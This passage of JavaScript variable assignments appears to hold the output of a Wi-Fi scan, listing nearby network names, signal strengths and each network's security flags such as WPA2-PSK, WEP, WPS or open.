var ssid_52="HP-Print-29-Officejet Pro 8600";
var ssid_53="YBL540 Office";
var ssid_54="Kelefant";
var ssid_55="SKNet";
var ssid_56="HOME-4688";
var ssid_57="ATT504";
var ssid_58="ATT3D637f3";
var ssid_59="ATT336";
var ssid_60="";
var ssid_61="xfinitywifi";
var ssid_62="xfinitywifi";
var ssid_63="jaljeera";
var ssid_64="DNG24";
var ssid_65="happy";
var ssid_66="xfinitywifi";
var signal_1="bssid";
var signal_2="255";
var signal_3="239";
var signal_4="229";
var signal_5="229";
var signal_6="198";
var signal_7="198";
var signal_8="188";
var signal_9="178";
var signal_10="168";
var signal_11="168";
var signal_12="168";
var signal_13="168";
var signal_14="168";
var signal_15="158";
var signal_16="158";
var signal_17="158";
var signal_18="158";
var signal_19="147";
var signal_20="147";
var signal_21="147";
var signal_22="147";
var signal_23="147";
var signal_24="147";
var signal_25="147";
var signal_26="137";
var signal_27="137";
var signal_28="137";
var signal_29="137";
var signal_30="137";
var signal_31="137";
var signal_32="137";
var signal_33="137";
var signal_34="137";
var signal_35="137";
var signal_36="137";
var signal_37="137";
var signal_38="137";
var signal_39="137";
var signal_40="127";
var signal_41="127";
var signal_42="127";
var signal_43="127";
var signal_44="127";
var signal_45="127";
var signal_46="127";
var signal_47="127";
var signal_48="127";
var signal_49="127";
var signal_50="127";
var signal_51="127";
var signal_52="127";
var signal_53="117";
var signal_54="117";
var signal_55="117";
var signal_56="117";
var signal_57="117";
var signal_58="117";
var signal_59="117";
var signal_60="117";
var signal_61="117";
var signal_62="117";
var signal_63="107";
var signal_64="107";
var signal_65="107";
var signal_66="107";
var secret_1="bssid";
var secret_2="[WPA2-PSK-CCMP][ESS]";
var secret_3="[WPA2-PSK-CCMP][ESS]";
var secret_4="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_5="[WPA2-PSK-CCMP][ESS]";
var secret_6="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_7="[WEP][ESS]";
var secret_8="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_9="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_10="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_11="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_12="[WPA2-PSK-CCMP][ESS]";
var secret_13="[WPA2-PSK-CCMP][ESS]";
var secret_14="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_15="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_16="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_17="[WPA2-PSK-CCMP][ESS]";
var secret_18="[WPA2-PSK-CCMP][ESS]";
var secret_19="[WPS][WEP][ESS]";
var secret_20="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_21="[WPA2-PSK-CCMP][ESS]";
var secret_22="[WPA-PSK-CCMP][WPA2-PSK-CCMP][WPS][ESS]";
var secret_23="[ESS]";
var secret_24="[ESS]";
var secret_25="[ESS]";
var secret_26="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_27="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_28="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_29="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_30="[WPA2-PSK-CCMP][ESS]";
var secret_31="[WPA2-PSK-CCMP][ESS]";
var secret_32="[WPA2-PSK-CCMP][ESS]";
var secret_33="[WPA2-PSK-CCMP][ESS]";
var secret_34="[WPA2-PSK-CCMP][ESS]";
var secret_35="[WPA2-PSK-CCMP][ESS]";
var secret_36="[WPA2-PSK-CCMP+TKIP][ESS]";
var secret_37="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][WPS][ESS]";
var secret_38="[ESS]";
var secret_39="[ESS]";
var secret_40="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_41="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_42="[WPA2-PSK-CCMP][ESS]";
var secret_43="[WPA2-PSK-CCMP][ESS]";
var secret_44="[WPA2-PSK-CCMP][ESS]";
var secret_45="[WPA2-PSK-CCMP][ESS]";
var secret_46="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][WPS][ESS]";
var secret_47="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_48="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_49="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_50="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_51="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_52="[ESS]";
var secret_53="[WPA2-PSK-CCMP][ESS]";
var secret_54="[WPA2-PSK-CCMP][ESS]";
var secret_55="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][WPS][ESS]";
var secret_56="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][WPS][ESS]";
var secret_57="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_58="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_59="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_60="[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]";
var secret_61="[ESS]";
var secret_62="[ESS]";
var secret_63="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_64="[WPA2-PSK-CCMP][WPS][ESS]";
var secret_65="[WPA2-PSK-CCMP][ESS]";
var secret_66="[ESS]";
```